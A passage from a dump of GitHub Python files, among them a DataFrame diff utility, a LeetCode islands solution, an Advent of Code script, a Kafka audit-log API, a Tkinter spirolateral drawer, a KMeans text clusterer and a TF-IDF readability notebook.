column_mismatches(columns: list):\r\n \"\"\"List columns with mismatches.\r\n\r\n Args:\r\n columns (list): A list of columns containing mismatches.\r\n\r\n \"\"\"\r\n # pylint: disable=consider-using-f-string\r\n ui.print_('\\nColumn mismatches:', fore='cyan', style='normal')\r\n print(*map('- {}'.format, columns), sep='\\n')\r\n\r\n @staticmethod\r\n def column_mismatches_none():\r\n \"\"\"Print message for no column mismatches.\"\"\"\r\n ui.print_('\\nNo mismatches for this set.', fore='green')\r\n\r\n def data_mismatches(self, column: str, mismatches: list):\r\n \"\"\"Print the data mismatches.\r\n\r\n Args:\r\n column (str): Name of the column being analysed.\r\n mismatches (list): A list of tuples containing data mismatches,\r\n as::\r\n\r\n [(0, 0, 1, 2), (1, 1, 3, 4)]\r\n\r\n \"\"\"\r\n ui.print_(f'Data mismatches for column: {column}', fore='yellow')\r\n print(self._FMT.format('SrcRow', 'TstRow', 'SrcValue', 'TstValue'))\r\n print('-'*92)\r\n print(*(self._FMT.format(*m) for m in mismatches), sep='\\n')\r\n print()\r\n\r\n @staticmethod\r\n def data_mismatches_none(column: str):\r\n \"\"\"Print message for no data mismatches.\r\n\r\n Args:\r\n column (str): Name of the column being analysed.\r\n\r\n \"\"\"\r\n ui.print_(f'\\nNo data mismatches for {column}', fore='green')\r\n\r\n\r\nclass DataFrameDiff:\r\n \"\"\"Test and report differences in two pandas DataFrames.\r\n\r\n Args:\r\n df_source (pd.DataFrame): DataFrame containing **source** data.\r\n This dataset holds the **expected** results.\r\n df_test (pd.DataFrame): DataFrame containing the **test** data.\r\n This dataset is compared against the 'expected' dataset.\r\n\r\n \"\"\"\r\n\r\n def __init__(self, df_source: pd.DataFrame, df_test: pd.DataFrame):\r\n \"\"\"DataFrame difference class initialiser.\"\"\"\r\n self._df_s = df_source\r\n self._df_t = df_test\r\n self._col_mismatches = []\r\n self._msg = _Messages()\r\n\r\n def diff(self):\r\n \"\"\"Compare DataFrames and report the differences.\"\"\"\r\n self._get_mismatches()\r\n self._report()\r\n\r\n def _get_mismatches(self):\r\n \"\"\"Build a list of columns with mismatches.\"\"\"\r\n # Add column to list if it contains a mismatch.\r\n mis = [col for col in self._df_s.columns\r\n if not self._df_t[col].equals(self._df_s[col])]\r\n if mis:\r\n self._msg.column_mismatches(columns=self._col_mismatches)\r\n else:\r\n self._msg.column_mismatches_none()\r\n self._col_mismatches = mis\r\n\r\n def _report(self) -> None:\r\n \"\"\"Compare values in mismatched columns and report.\"\"\"\r\n for col in self._col_mismatches:\r\n mismatches = []\r\n # Zip source and test datasets.\r\n for (idx1, row1), (idx2, row2) in zip_longest(self._df_s.iterrows(),\r\n self._df_t.iterrows(),\r\n fillvalue=(None, None)):\r\n # Catch if a row exists in one dataset and not the other.\r\n if any([row1 is None, row2 is None]):\r\n idx1 = idx1 if idx1 is not None else idx2\r\n idx2 = idx2 if idx2 is not None else idx1\r\n val1 = str(row1[col]) if row1 is not None else 'no value (source)'\r\n val2 = str(row2[col]) if row2 is not None else 'no value (test)'\r\n # Convert datetimes to string for compare.\r\n elif isinstance(row2[col], pd.Timestamp):\r\n val1 = str(row1[col])\r\n val2 = str(row2[col])\r\n # Enable compare of nan types.\r\n elif any([pd.isna(row1[col]), pd.isna(row2[col])]):\r\n # Convert mismatched nan/NaT types to 'NaT' string.\r\n if all([pd.isna(row1[col]), row2[col] is pd.NaT]):\r\n val1 = 'NaT'\r\n val2 = 'NaT'\r\n else:\r\n val1 = str(row1[col])\r\n val2 = str(row2[col])\r\n # Reformat floats to align.\r\n elif any([isinstance(row1[col], float), isinstance(row2[col], float)]):\r\n val1 = round(float(row1[col]), 5)\r\n val2 = round(float(row2[col]), 5)\r\n else:\r\n # Convert to string for each compare.\r\n val1 = str(row1[col])\r\n val2 = str(row2[col])\r\n # Do the compare.\r\n if val1 != val2:\r\n # Add any mismatches to a list for reporting.\r\n mismatches.append((idx1, idx2, val1, val2))\r\n if mismatches:\r\n self._msg.data_mismatches(column=col, mismatches=mismatches)\r\n else:\r\n self._msg.data_mismatches_none(column=col)\r\n","repo_name":"S3DEV/utils4","sub_path":"utils4/dfdiff.py","file_name":"dfdiff.py","file_ext":"py","file_size_in_byte":6475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"36260189835","text":"class Solution:\n def numIslands(self, grid) -> int:\n directions = [[0, 1], [0, -1], [1, 0], [-1, 0]]\n m = len(grid)\n if m == 0:\n return 0\n n = len(grid[0])\n mark = [[False for i in range(n)] for i in range(m)]\n res = 0\n\n def doMark(row, col):\n mark[row][col] = True\n for direction in directions:\n new_row = row + direction[0]\n new_col = col + direction[1]\n if 0 <= new_row < m and 0 <= new_col < n and grid[new_row][new_col] == \"1\" and mark[new_row][new_col] is False:\n doMark(new_row, new_col)\n\n for i in range(m):\n for j in range(n):\n if grid[i][j] == \"1\" and mark[i][j] is False:\n doMark(i, j)\n res += 1\n\n return res\n\n\nslu = Solution()\nprint(slu.numIslands([]))\n","repo_name":"kefirzhang/algorithms","sub_path":"leetcode/python/medium/p200_numIslands.py","file_name":"p200_numIslands.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22904436786","text":"from aocd import get_data\nimport math\n\ndata = get_data(day=12).split(\"\\n\")\n\ncurr_angle = 0\npos1 = [0, 0]\npos2 = [0, 0]\nwaypoint = [10, 1]\ndirs = {\"N\": 90, \"W\": 180, \"S\": 270, \"E\": 0}\n\nfor v in data:\n d = v[0]\n a = int(v[1:])\n\n if d == \"F\":\n pos1[0] += round(math.cos(curr_angle) * a)\n pos1[1] += round(math.sin(curr_angle) * a)\n pos2[0] += waypoint[0] * a\n pos2[1] += waypoint[1] * a\n elif d in dirs:\n ang = math.radians(dirs[d])\n pos1[0] += round(math.cos(ang) * a)\n pos1[1] += round(math.sin(ang) * a)\n waypoint[0] += round(math.cos(ang)) * a\n waypoint[1] += round(math.sin(ang)) * a\n else:\n a_r = math.radians(a)\n if d == \"L\":\n curr_angle += math.radians(a)\n else:\n curr_angle -= math.radians(a)\n a_r = -a_r\n\n x, y = waypoint\n x_p = round(x * math.cos(a_r) - y * math.sin(a_r))\n y_p = round(y * math.cos(a_r) + x * math.sin(a_r))\n waypoint = [x_p, y_p]\n\nprint(abs(pos1[0]) + abs(pos1[1]))\nprint(abs(pos2[0]) + abs(pos2[1]))","repo_name":"13Ducks/advent-of-code-2020","sub_path":"day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":1086,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24743778084","text":"import connexion\nfrom pykafka import KafkaClient\nimport yaml\nimport logging\nimport logging.config\nimport json\nfrom flask_cors import CORS, cross_origin\nimport os\n\n\nif \"TARGET_ENV\" in os.environ and os.environ[\"TARGET_ENV\"] == \"test\":\n print(\"In Test Environment\")\n app_conf_file = \"/config/app_conf.yml\"\n log_conf_file = \"/config/log_conf.yml\"\nelse:\n print(\"In Dev Environment\")\n app_conf_file = \"app_conf.yml\"\n log_conf_file = \"log_conf.yml\"\n\n\nwith open(app_conf_file, 'r') as f:\n app_config = yaml.safe_load(f.read())\n\n# External Logging Configuration\nwith open(log_conf_file, 'r') as f:\n log_config = yaml.safe_load(f.read())\n logging.config.dictConfig(log_config)\n\nlogger = logging.getLogger('basicLogger')\n\nlogger.info(\"App Conf File: %s\"% app_conf_file)\nlogger.info(\"Log Conf File: %s\"% log_conf_file)\n\n\n\ndef get_inventory_count(index):\n hostname = \"%s:%d\" % (app_config['events']['hostname'],\n app_config['events']['port'])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config['events']['topic'])]\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n \n logger.info(\"Retrieving count at index %d\" % index)\n try:\n count_events = []\n\n for msg in consumer:\n msg_str = msg.value.decode(\"utf-8\")\n msg = json.loads(msg_str)\n print(msg)\n # find event at index + return event & 200\n if msg['type'] == 'count':\n count_events.append(msg)\n \n if index in range(0, len(count_events)):\n return count_events[index], 200\n else:\n \n return {\"message\": \"Not found\"}, 404\n\n\n except:\n logger.error(\"No more messages found\")\n print()\n \n logger.error(\"Could not find count at index %d\" % index)\n return {\"message\": \"Not found\"}, 404\n\n\n\n\n\n\n\n\n\ndef get_checked_items(index):\n hostname = \"%s:%d\" % (app_config['events']['hostname'],\n app_config['events']['port'])\n client = KafkaClient(hosts=hostname)\n topic = client.topics[str.encode(app_config['events']['topic'])]\n consumer = topic.get_simple_consumer(reset_offset_on_start=True,\n consumer_timeout_ms=1000)\n \n logger.info(\"Retrieving checked item at index %d\" % index)\n try:\n check_events = []\n\n for msg in consumer:\n msg_str = msg.value.decode(\"utf-8\")\n msg = json.loads(msg_str)\n\n # find event at index + return event & 200\n if msg['type'] == 'check':\n check_events.append(msg)\n \n if index in range(0, len(check_events)):\n return check_events[index], 200\n else:\n return {\"message\": \"Not found\"}, 404\n\n\n except:\n logger.error(\"No more messages found\")\n print()\n \n logger.error(\"Could not find checked item at index %d\" % index)\n return {\"message\": \"Not found\"}, 404\n\napp = connexion.FlaskApp(__name__, specification_dir=\"\")\n\nif \"TARGET_ENV\" not in os.environ or os.environ[\"TARGET_ENV\"] != \"test\":\n CORS(app.app)\n app.app.config['CORS_HEADERS'] = 'Content-Type'\n\napp.add_api(\"openapi.yml\", base_path=\"/audit_log\", strict_validation=True, validate_responses=True)\n\nif __name__ == \"__main__\":\n app.run(port=8110)\n","repo_name":"ricadv/rfid_app","sub_path":"audit_log/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4553270133","text":"from tkinter import *\nimport turtle\n\n\nclass Spirolateral:\n '''\n Spirolateral Class that stores the necessary data for a spirolateral\n '''\n\n def __init__(self, name: str, timestable: int, angle: int):\n '''Constructor method'''\n self.name = name\n self.timestable = timestable\n self.angle = angle\n self.digitalList = []\n\n def digit_root(self, n):\n '''Calculates a digital root(modulo9)'''\n return (n - 1) % 9 + 1 if n else 0\n\n def digitCalc(self):\n '''Calculates a 'times table list' that is used\n as a range for the turtle to draw'''\n for i in range(20):\n test = (i+1)\n\n n = int(test * self.timestable)\n value = self.digit_root(n)\n if value in self.digitalList:\n break\n else:\n self.digitalList.append(value)\n return(self.digitalList)\n\n\nclass Application(Frame):\n '''\n GUI Application\n '''\n\n def __init__(self, master):\n super().__init__(master) # to ensure parent is called correctly.\n # Set the windows title,\n # calls winfo_toplevel to ensure the correct root is modified.\n self.winfo_toplevel().title(\"Spirolaterals\")\n\n # Constants for formatting\n self.BG_COL = \"#4286f4\"\n self.PX = 20\n self.PY = 10\n self.WDTH = 800\n self.HGHT = 400\n\n # setting up a main container\n self.__maincontainer = Frame(master, width=self.WDTH, height=self.HGHT)\n self.__maincontainer.grid(row=0, column=0, sticky=\"nsew\")\n\n # Setting up the initial frame for the home window.\n self.__homeframe = Frame(self.__maincontainer,\n width=self.WDTH/2, height=self.HGHT)\n self.__homeframe.grid(row=0, column=0, sticky=\"nsew\")\n\n # header in the homeframe\n self.displaying_header = Frame(self.__homeframe, bg=self.BG_COL,\n width=self.WDTH/2, height=60)\n self.displaying_header.grid_propagate(0)\n self.displaying_header.grid(row=0, columnspan=2)\n\n # Setting up the frame for the canvas\n self.__canvasframe = Frame(\n self.__maincontainer, width=self.WDTH/2, height=self.HGHT)\n self.__canvasframe.grid_propagate(0) # to reserve space.\n self.__canvasframe.grid(row=0, column=1, sticky='E')\n\n self.canvas = Canvas(self.__canvasframe,\n height=self.HGHT, width=self.WDTH/2)\n self.canvas.grid(row=0, column=3)\n\n # Setting up the frame for the data input\n self.__inputframe = Frame(self.__maincontainer, width=self.WDTH/2,\n height=self.HGHT)\n self.__inputframe.grid_propagate(0)\n\n self.collecting_header = Frame(self.__inputframe, bg=self.BG_COL,\n width=self.WDTH/2, height=60)\n self.collecting_header.grid_propagate(0) # preserves the space we want\n self.collecting_header.grid(row=0, columnspan=2)\n\n collecting_label = Label(self.collecting_header, bg=self.BG_COL,\n text=\"Collecting Spiro Data\")\n collecting_label.grid(row=0, column=0, padx=self.PX, pady=self.PY)\n\n # data validation for our Entry boxes.\n self.vcmd = (master.register(self.validate_int),\n '%d', '%i', '%P', '%s', '%S', '%v', '%V', '%W')\n # the list that will store our spiros\n self.spirolateralist = []\n\n self.create_home_widgets()\n self.create_input_widgets()\n\n # setup turtle elements\n self.spiroTurt = turtle.RawTurtle(self.canvas)\n self.spiroTurt.hideturtle()\n\n def create_home_widgets(self):\n '''\n Method for creating widgets on the home frame.\n '''\n displaying_label = Label(\n self.displaying_header, bg=self.BG_COL,\n text=\"Displaying Spiro Data\")\n displaying_label.grid(row=0, column=0, padx=self.PX, pady=self.PY)\n\n self.go_to_collect_btn = Button(\n self.displaying_header, width=10, text=\"Add Spiro\",\n command=self.inputGrid)\n self.go_to_collect_btn.grid(row=0, column=1, padx=self.PX,\n pady=self.PY)\n\n name_label_d = Label(self.__homeframe, anchor=NW,\n text=\"Spiro Name:\")\n name_label_d.grid(row=1, column=0, sticky=NW, padx=self.PX,\n pady=self.PY)\n\n self.first_name = Label(self.__homeframe, anchor=NW)\n self.first_name.grid(row=1, column=1, sticky=NW, pady=self.PY)\n\n timestable_label_d = Label(self.__homeframe, anchor=NW,\n text=\"Times Table: \")\n timestable_label_d.grid(row=2, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.age = Label(self.__homeframe, anchor=NW)\n self.age.grid(row=2, column=1, sticky=NW, pady=self.PY)\n\n angel_label_d = Label(self.__homeframe, anchor=NW, text=\"Angle:\")\n angel_label_d.grid(row=3, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.angel = Label(self.__homeframe, anchor=NW)\n self.angel.grid(row=3, column=1, sticky=NW, pady=self.PY)\n\n self.mobile_info = Label(self.__homeframe)\n self.mobile_info.grid(row=4, columnspan=2)\n\n self.prev_btn = Button(self.__homeframe, text=\"Previous\",\n state=DISABLED, command=self.previous)\n self.prev_btn.grid(row=5, column=0,\n padx=self.PX/2, pady=self.PY, sticky='W')\n\n self.next_btn = Button(self.__homeframe, text=\"Next\",\n state=DISABLED, command=self.next_person)\n self.next_btn.grid(row=5, column=1,\n padx=self.PX/2, pady=self.PY, sticky='E')\n self.__index = 0 # to maintain our position in the list.\n\n self.turtleDrawButt = Button(\n self.__homeframe, text=\"Draw this Spiro.\",\n command=self.turtleSpiroDraw)\n self.turtleDrawButt.grid(row=5, columnspan=2, pady=15)\n\n def create_input_widgets(self):\n '''\n Method for creating widgets on the input frame\n '''\n self.go_to_display_btn = Button(\n self.collecting_header, width=10, text=\"Show All\",\n command=self.homeGrid)\n self.go_to_display_btn.grid(\n row=0, column=1, padx=self.PX, pady=self.PY)\n\n fname_label = Label(self.__inputframe, anchor=NW,\n text=\"Spiro Name:\")\n fname_label.grid(row=1, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.spiro_name_entry = Entry(self.__inputframe)\n self.spiro_name_entry.grid(row=1, column=1, sticky=NW,\n pady=self.PY, padx=self.PX)\n\n timestable_label = Label(\n self.__inputframe, anchor=NW, text=\"Times Table:\")\n timestable_label.grid(row=2, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.seg_ent = Entry(\n self.__inputframe, validate='key', validatecommand=self.vcmd)\n self.seg_ent.grid(row=2, column=1, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n angel_label = Label(self.__inputframe, anchor=NW, text=\"Angle:\")\n angel_label.grid(row=3, column=0, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.ang_ent = Entry(\n self.__inputframe, validate='key', validatecommand=self.vcmd)\n self.ang_ent .grid(row=3, column=1, sticky=NW,\n padx=self.PX, pady=self.PY)\n\n self.create_person_btn = Button(self.__inputframe, width=10,\n text=\"Enter Data\",\n command=self.make_spiro)\n self.create_person_btn.grid(row=5, columnspan=2, pady=15)\n self.errorLabel = Label(self.__inputframe, text=\"\")\n self.errorLabel.grid(row=6, columnspan=2)\n\n def validate_int(self, action, index, value_if_allowed,\n prior_value, text, validation_type, trigger_type,\n widget_name):\n '''\n Integer validation for entry boxes.\n '''\n if(action == '1'):\n if text in '0123456789-+':\n try:\n int(value_if_allowed)\n return True\n except ValueError:\n return False\n else:\n return False\n else:\n return True\n\n def inputGrid(self):\n \"\"\" Switches from collecting frame to displaying frame. \"\"\"\n self.__homeframe.grid_forget()\n self.__inputframe.grid_propagate(0)\n self.__inputframe.grid(row=0, column=0, sticky=\"nsew\")\n\n def homeGrid(self):\n self.__inputframe.grid_forget()\n self.__homeframe.grid_propagate(0)\n self.__homeframe.grid(row=0, column=0, sticky=\"nsew\")\n\n if len(self.spirolateralist) > 0:\n self.show_data()\n self.mobile_info.configure(\n text=\"\")\n else:\n self.mobile_info.configure(\n text=\"There is not currently any data to show\")\n\n def make_spiro(self):\n '''Creates a spirolateral object'''\n if \"\" in {self.spiro_name_entry.get(),\n self.seg_ent.get(), self.ang_ent.get()}:\n\n self.errorLabel.configure(text=\"There is no data entered.\")\n else:\n self.errorLabel.configure(text=\"\")\n spiroClass = Spirolateral(self.spiro_name_entry.get(\n ), self.seg_ent.get(), self.ang_ent.get())\n self.spirolateralist.append(spiroClass)\n self.clear()\n if len(self.spirolateralist) > 1:\n self.next_btn.configure(state=NORMAL)\n\n def clear(self):\n \"\"\" Clears entries and selections in input frame. \"\"\"\n self.spiro_name_entry.delete(0, END)\n self.seg_ent.delete(0, END)\n self.ang_ent.delete(0, END)\n\n def next_person(self):\n \"\"\" Increments self.__index and calls show_data method. Disables next\n button if at the end of the list. Ensures prev button is normal.\"\"\"\n self.__index += 1\n\n if self.__index == len(self.spirolateralist)-1:\n self.next_btn.configure(state=DISABLED)\n\n self.prev_btn.configure(state=NORMAL)\n self.show_data()\n\n def previous(self):\n \"\"\" Decrements self.__index and calls show_data method. Disables prev\n button if at the start of the list. Ensures next button is normal.\"\"\"\n\n self.__index -= 1\n if self.__index == 0:\n self.prev_btn.configure(state=DISABLED)\n\n self.next_btn.configure(state=NORMAL)\n self.show_data()\n\n def show_data(self):\n \"\"\" Configures the displaying frame to show data associated with person\n object stored at self.__index\"\"\"\n self.first_name.configure(text=self.spirolateralist[self.__index].name)\n self.age.configure(text=self.spirolateralist[self.__index].timestable)\n self.angel.configure(text=\"{}°\".format(\n self.spirolateralist[self.__index].angle))\n\n def turtleSpiroDraw(self):\n try:\n self.mobile_info.configure(text=\"\")\n angle = int(self.spirolateralist[self.__index].angle)\n complete = False\n self.spiroTurt.reset() # clears any previous drawings\n\n startPosx, startPosy = self.spiroTurt.pos()\n startPos = (startPosx, startPosy)\n self.spiroTurt.speed(-1) # for maximum speed\n self.spiroTurt.hideturtle()\n cycles = 0\n SCALE = 20\n while not complete:\n for distance in self.spirolateralist[self.__index].digitCalc():\n # range increases for more timestables\n print(distance)\n self.spiroTurt.left(180 - angle)\n # turns correctly to give the desired shape\n self.spiroTurt.forward(distance * SCALE)\n # increases the size of the spiro by a factor.\n\n cycles += 1\n\n currentPosx, currentPosy = self.spiroTurt.pos()\n # grabs current pos\n currentPos = (round(currentPosx, 3), round(currentPosy, 3))\n print(\"Current cycle\", cycles)\n\n if currentPos == startPos:\n print(\"We're done here\")\n complete = True\n except:\n self.mobile_info.configure(\n text=\"There is not currently any data to draw!\")\n\n\nif __name__ == \"__main__\":\n # Executes when the file itself is run, not when imported.\n root = Tk()\n app = Application(root)\n app.mainloop()\n","repo_name":"EthanJohns02/Spirolateral","sub_path":"SpiroGUI.py","file_name":"SpiroGUI.py","file_ext":"py","file_size_in_byte":12907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17390259584","text":"from sklearn.cluster import KMeans\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sklearn.metrics.pairwise import euclidean_distances\nimport numpy as np\nimport pickle\nimport pandas as pd\nimport torch\nfrom typing import Tuple, List, Optional\n\nfrom abc import ABC, abstractmethod\n\nfrom src.data import BaseData, VectorizedData\nfrom src.summary import summarize\n\n\nclass Cluster:\n def __init__(\n self, cluster_id: int, center, chunks: List[str], embeddings: torch.Tensor\n ) -> None:\n self.cluster_id = cluster_id\n self.center = center\n self.chunks = chunks\n self.embeddings = embeddings\n\n self.summary = None\n\n def get_summary(self):\n if self.summary is None:\n self.summary = summarize(\" \".join(self.chunks[:3]))\n return self.summary\n\n\nclass Clusterizator(ABC):\n def __init__(self, vectorized_data: VectorizedData) -> None:\n self.vectorized_data = vectorized_data\n self.chunks = self.vectorized_data.get_chunks()\n self.embeddings = self.vectorized_data.get_embeddings()\n self.clusters = {}\n\n def clusterize(\n self,\n num_clusters: Optional[int] = None,\n embeddings: Optional[np.ndarray] = None,\n ):\n if embeddings is None:\n embeddings = self.embeddings\n\n self._clusterize(embeddings, num_clusters)\n self._set_clusters()\n\n def _set_clusters(self):\n for cluster_id, center in enumerate(self.get_clusters_centers()):\n cluster_chunks, cluster_vectors = self.get_vectors_by_cluster_id(cluster_id)\n cluster = Cluster(cluster_id, center, cluster_chunks, cluster_vectors)\n\n self.clusters[cluster_id] = cluster\n\n def get_cluster_by_id(self, cluster_id) -> Cluster:\n return self.clusters[cluster_id]\n\n def get_cluster_summaries(self):\n summaries = {}\n for cluster_id, cluster in self.clusters.items():\n summaries[cluster_id] = cluster.get_summary()\n return summaries\n\n @abstractmethod\n def _clusterize(self, embeddings: torch.Tensor):\n ...\n\n @abstractmethod\n def get_clusters_centers(self) -> np.ndarray:\n ...\n\n @abstractmethod\n def get_vectors_by_cluster_id(self, cluster_id, top_k=None):\n ...\n\n def get_samples(self, top_k=3):\n samples = []\n for cluster_id, center in enumerate(self.get_clusters_centers()):\n sample_cluster = self.get_vectors_by_cluster_id(cluster_id, top_k=top_k)\n samples.append(sample_cluster)\n return samples\n\n\nclass KMeansClusterizator(Clusterizator):\n def determine_k(self, embeddings):\n k_min = 10\n clusters = [x for x in range(2, k_min * 11)]\n metrics = []\n for i in clusters:\n metrics.append((KMeans(n_clusters=i, n_init=10).fit(embeddings)).inertia_)\n\n k = self.elbow(k_min, clusters, metrics)\n return k\n\n def elbow(self, k_min, clusters, metrics):\n score = []\n\n for i in range(k_min, clusters[-3]):\n y1 = np.array(metrics)[: i + 1]\n y2 = np.array(metrics)[i:]\n\n df1 = pd.DataFrame({\"x\": clusters[: i + 1], \"y\": y1})\n df2 = pd.DataFrame({\"x\": clusters[i:], \"y\": y2})\n\n reg1 = LinearRegression().fit(np.asarray(df1.x).reshape(-1, 1), df1.y)\n reg2 = LinearRegression().fit(np.asarray(df2.x).reshape(-1, 1), df2.y)\n\n y1_pred = reg1.predict(np.asarray(df1.x).reshape(-1, 1))\n y2_pred = reg2.predict(np.asarray(df2.x).reshape(-1, 1))\n\n score.append(\n mean_squared_error(y1, y1_pred) + mean_squared_error(y2, y2_pred)\n )\n\n return np.argmin(score) + k_min\n\n def _clusterize(self, num_clusters: Optional[int], embeddings: np.ndarray):\n if num_clusters is None:\n num_clusters = self.determine_k(embeddings)\n\n self.kmeans = KMeans(n_clusters=num_clusters, random_state=42).fit(embeddings)\n self.kmeans_labels = self.kmeans.labels_\n\n def get_clusters_centers(self) -> np.ndarray:\n return self.kmeans.cluster_centers_\n\n def get_vectors_by_cluster_id(\n self, cluster_id: int, top_k: int = None\n ) -> Tuple[List[str], List[np.ndarray]]:\n data = pd.DataFrame()\n data[\"text\"] = self.chunks\n data[\"label\"] = self.kmeans_labels\n data[\"embedding\"] = list(self.embeddings)\n\n kmeans_centers = self.get_clusters_centers()\n\n cluster = data[data[\"label\"].eq(cluster_id)]\n embeddings = list(cluster[\"embedding\"])\n texts = list(cluster[\"text\"])\n distances = [\n cosine_similarity(kmeans_centers[0].reshape(1, -1), e.reshape(1, -1))[0][0]\n for e in embeddings\n ]\n scores = list(zip(texts, distances))\n\n if top_k is None:\n top_k = len(scores)\n\n top_k = min(len(scores), top_k)\n\n top = sorted(scores, key=lambda x: x[1])[:top_k]\n top_texts = list(zip(*top))[0]\n return top_texts, embeddings\n\n def save(self, pth: str = \"data/clusters.pkl\"):\n with open(pth, \"wb\") as model_file:\n pickle.dump(self.kmeans, model_file)\n\n def load(self, pth: str = \"data/clusters.pkl\"):\n with open(pth, \"rb\") as model_file:\n self.kmeans = pickle.load(model_file)\n self.kmeans_labels = self.kmeans.labels_\n\n self._set_clusters()\n\n\nclass DBSCANClusterizator(Clusterizator):\n ...\n","repo_name":"chega8/telegram_clustering","sub_path":"src/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74840922726","text":"# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nimport pickle\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport pandas as pd\nfrom nlp import nlp as nlp\n\nLangProcessor = nlp()\n\n\n# %%\nwith open(\"anal.pickle\", \"rb\") as f:\n data = pickle.load(f)\n\n\ncorpus = []\ncols = []\n\nfor d in data:\n corpus.append(d['text'])\n\nfor d in data:\n cols.append(d['link']) \n\n\n# %%\nvectorizer = TfidfVectorizer(stop_words='english', ngram_range = (1,1), max_df = .6, min_df = .01, decode_error='ignore', strip_accents='unicode', analyzer='word',\n tokenizer=LangProcessor.tokenize)\n\n\n# %%\nX = vectorizer.fit_transform(corpus)\n\n\n# %%\nfeature_names = vectorizer.get_feature_names()\n\n\n# %%\ndense = X.todense()\ndenselist = dense.tolist()\ndf = pd.DataFrame(denselist, columns=feature_names)\ndf.head()\n\n\n# %%\ndat = df.transpose()\n\nrecs = []\n\n# Find the top 30 words written by each author\ntop_dict = {}\nfor c in range(0,len(cols)):\n top = dat.iloc[:,c].sort_values(ascending=False).head(30)\n top_dict[dat.columns[c]]= list(zip(top.index, top.values))# Print the top 15 words from each article\nfor p, top_words in top_dict.items():\n rec = {'link': cols[p]}\n index = 0\n for word, count in top_words[0:5]:\n rec[str(index)+\" term\"] = word\n rec[str(index)+\" termCounts\"] = count\n index = index+1\n\n stats = LangProcessor.stats(data[p]['text'])\n sentiment = LangProcessor.lang_senti(data[p]['text'])\n rec['standard'] = stats['standard']\n rec['lexCount'] = stats['lexicon count'] \n rec['flesch'] = stats['flesch_reading_ease']\n rec['pol'] = sentiment[0]\n rec['subjectivity'] = sentiment[1]\n recs.append(rec)\n\nprint(recs[0])\n\n\n# %%\nwith open(\"analytis.pickle\", \"wb\") as f:\n pickle.dump(recs, f, pickle.HIGHEST_PROTOCOL)\n\n\n# %%\ndataframe = pd.DataFrame(recs)\n\n\n# %%\ndataframe.head()\n\n\n# %%\ndataframe.info()\n\n\n# %%\nimport altair as alt\n\ngrades = {\n'10th and 11th grade': '4: 10th-11th',\n'11th and 12th grade': '5: 11th-12th',\n'12th and 13th grade': '6: 12th-13th',\n'13th and 14th grade': '7: 13th-14th',\n'14th and 15th grade': '8: 14th-15th',\n'15th and 16th grade': '9: 15th-16th',\n'16th and 17th grade': '10: 16th-17th', \n'17th and 18th grade': '11: > 17th', \n'18th and 19th grade': '11: > 17th', \n'19th and 20th grade': '11: > 17th', \n'20th and 21st grade': '11: > 17th', \n'21st and 22nd grade': '11: > 17th', \n'22nd and 23rd grade': '11: > 17th', \n'23rd and 24th grade': '11: > 17th', \n'24th and 25th grade': '11: > 17th', \n'25th and 26th grade': '11: > 17th', \n'26th and 27th grade': '11: > 17th',\n'27th and 28th grade': '11: > 17th', \n'28th and 29th grade': '11: > 17th',\n'29th and 30th grade': '11: > 17th',\n'30th and 31st grade': '11: > 17th', \n'31st and 32nd grade': '11: > 17th',\n'32nd and 33rd grade': '11: > 17th', \n'35th and 36th grade': '11: > 17th', \n'36th and 37th grade': '11: > 17th',\n'37th and 38th grade': '11: > 17th', \n'38th and 39th grade': '11: > 17th',\n'3rd and 4th grade': '1: 3rd-4th', \n'57th and 58th grade': '11: > 17th',\n'8th and 9th grade': '2: 8th-9th',\n'9th and 10th grade': '3: 9th-10th'}\n\ndef flesch(x):\n response = 'Extremely confusing'\n if x< 30:\n response = 'Very confusing'\n elif x>29 and x<50:\n response = 'Difficult'\n elif x>49 and x<60:\n response = 'Fairly Difficult'\n\n elif x>59 and x<70:\n response = 'Standard'\n\n elif x>69 and x<80:\n response = 'Fairly Easy'\n\n elif x>79 and x<90:\n response = 'Easy'\n\n elif x > 89:\n response = 'Very Easy'\n \n return response\n\n\ndataframe['ReadingDiff'] = dataframe.flesch.apply(lambda x: flesch(x))\n\nf = dataframe.groupby('standard').count()['link']\nf = f.reset_index()\nf.columns = ['Grade','Count']\n\nf['cat']= f.Grade.apply(lambda x: grades[x])\n\nf\n\n\n# %%\ndataframe['lexCount'].plot()\n\n\n# %%\np = (alt.\n Chart(dataframe).\n mark_circle(size=40).\n encode(x='pol',y='subjectivity').\n properties(height=200, width=400, title='objectivity versus polarity') \n \n)\n\np1Line = alt.Chart(dataframe).mark_rule(color='red').encode(y='mean(subjectivity):Q')\np2Line = alt.Chart(dataframe).mark_rule(color='red').encode(x='mean(pol):Q')\n\nline = pd.DataFrame({'x': [0,0], 'y': [0,1]})\np3Line = alt.Chart(line).mark_line(color='green').encode(x='x',y='y')\n\np3 = p+p1Line+p2Line+p3Line\n\n\n# %%\np1Line = alt.Chart(dataframe).mark_rule(color='red').encode(y='mean(flesch):Q')\np2Line = 